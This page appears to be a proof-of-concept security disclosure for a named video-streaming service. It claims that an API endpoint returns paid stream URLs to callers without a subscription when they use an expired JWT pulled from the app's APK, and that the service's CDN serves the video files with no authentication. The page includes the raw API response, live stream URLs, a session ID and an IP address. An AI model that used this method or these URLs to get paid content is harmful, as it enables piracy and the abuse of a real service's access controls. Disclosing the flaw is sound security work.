SECURITY RESEARCH PoC  |  The video below plays from Munowatch CDN with NO valid subscription — server-side entitlement not enforced
SECURITY PoC — NO AUTH
CDN BYPASS DEMO — Munowatch CDN serves this video with no token, no auth header required
CDN bypass demonstration:
The API returned playingUrl for The Magic Blade with issubscriber: false and user_access: deny.
The video above plays from Munowatch's own CDN with zero authentication — any b-cdn.net URL is publicly accessible.
The Magic Blade
Vj Banks Series 45h 32m 9 months ago

Twenty-four years ago, "God of Sabre" Yang Chang Feng was double-crossed and murdered by someone close to him. Now his son Fu Hong Xue, a skilled swordsman himself, sets out to avenge his father's death. During his journey, Hong Xue meets with kindness and treachery, is conflicted by love and hatred, and eventually discovers the shocking truth behind his birth.

Episodes
Loading episodes…
 API Response Evidence — Vulnerability Proof
Endpoint called GET /api/preview/v2/59276/0
User ID used 0 (no user / not logged in)
JWT used Expired Feb 2024 (extracted from APK)
issubscriber false
user_access
paid_for YES (premium content)
substatus EXPIRED
serverhost 80
video_name P.1.The Magic Blade.VJ BANKS (2).mp4
playingUrl returned YES — URL in response
API playingUrl value https://munowatch.co/clips/ELI.mp4
CDN demo stream https://nkuba.b-cdn.net/cleve48/cfr/In.The.Grey.mp4

Finding: The server sets user_access=deny and issubscriber=false but still returns playingUrl in the same response. Subscription is enforced client-side only — any caller with the expired APK JWT can obtain stream URLs without a subscription. Munowatch CDN (b-cdn.net) serves content with no auth required (direct HTTP Range requests succeed with HTTP 206). 

{
    "id": 59276,
    "video_title": "The Magic Blade",
    "description": " Twenty-four years ago, \"God of Sabre\" Yang Chang Feng was double-crossed and murdered by someone close to him. Now his son Fu Hong Xue, a skilled swordsman himself, sets out to avenge his father's death. During his journey, Hong Xue meets with kindness and treachery, is conflicted by love and hatred, and eventually discovers the shocking truth behind his birth.",
    "video_name": "P.1.The Magic Blade.VJ BANKS (2).mp4",
    "filehistory": "",
    "openload": "0",
    "embedurl": "No",
    "serverhost": "80",
    "allow_openload": "0",
    "full_video_name": "",
    "duration": "45h 32m",
    "thumbnail": "https://apposters.b-cdn.net/laba/yo/naki/zXO1WRkaHa4948.jpg",
    "tfilehistory": "",
    "category_id": 5,
    "language_id": 1,
    "recording_date": "2025-09-19",
    "age_id": "18 +",
    "location": 1,
    "tab_category_id": 5,
    "series_code": "30809",
    "access": "1",
    "paid_for": "1",
    "new_movie": "1",
    "priority": "No",
    "size": "337.54 MB",
    "create_date": "2025-09-19 10:09:42",
    "schedule_date": "19.09.2025 10:36:01 AM",
    "user_id": 1118356,
    "vj_id": 43,
    "video_status_id": 0,
    "network_id": "45.221.10.185",
    "user_access": "",
    "notification": "No",
    "secduration": "163920.000000",
    "issubscriber": false,
    "genre": "Series",
    "vjname": "Vj Banks",
    "trailer_playing_url": "",
    "episodes": 28,
    "episode_state": "NEXT",
    "nxt_eps": "EPS   2",
    "nxt_eps_id": 59277,
    "nxt_eps_title": "The Magic Blade 2",
    "nxt_ldur": 0,
    "nxt_playing_url": "https://munowatch.co/clips/ELI.mp4",
    "playingUrl": "https://munowatch.co/clips/ELI.mp4",
    "ldur": 0,
    "session_id": "cb99afb5b31411a57538a97393de0e2e",
    "device": "web",
    "lang_name": "English to Luganda",
    "vjrelease": "9 months ago",
    "mstatus": false,
    "kstatus": "",
    "substatus": "EXPIRED"
}